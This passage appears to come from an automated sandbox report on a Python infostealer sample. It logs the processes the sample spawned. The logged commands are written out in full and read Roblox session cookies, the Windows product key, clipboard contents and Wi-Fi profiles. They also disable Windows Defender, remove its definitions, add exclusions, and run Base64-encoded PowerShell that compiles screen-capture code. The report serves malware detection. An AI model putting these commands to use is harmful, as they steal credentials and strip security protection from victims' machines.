              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exe'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -AllJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-Clipboard
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\netsh.exe netsh wlan show profile
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\systeminfo.exe systeminfo
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\getmac.exe getmac
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\c3m2uwl3\c3m2uwl3.cmdline"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3733.tmp" "c:\Users\user\AppData\Local\Temp\c3m2uwl3\CSC33F8CF1FA9DB4434A25723BA384E2070.TMP"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tree.com tree /A /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe C:\Users\user\AppData\Local\Temp\_MEI76002\rar.exe a -r -hp"123" "C:\Users\user\AppData\Local\Temp\R9FJX.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend && powershell set-mppreference -submitsamplesconsent 2 & "%programfiles%\windows defender\mpcmdrun.exe" -removedefinitions -all"Jump to behavior
              Source: C:\Users\user\Desktop\SecuriteInfo.com.Python.Muldrop.18.23042.15901.exeProcess created: C:\Windows\System32\cmd.exe c:\windows\system32\cmd.exe /c "powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiaJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversendJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaia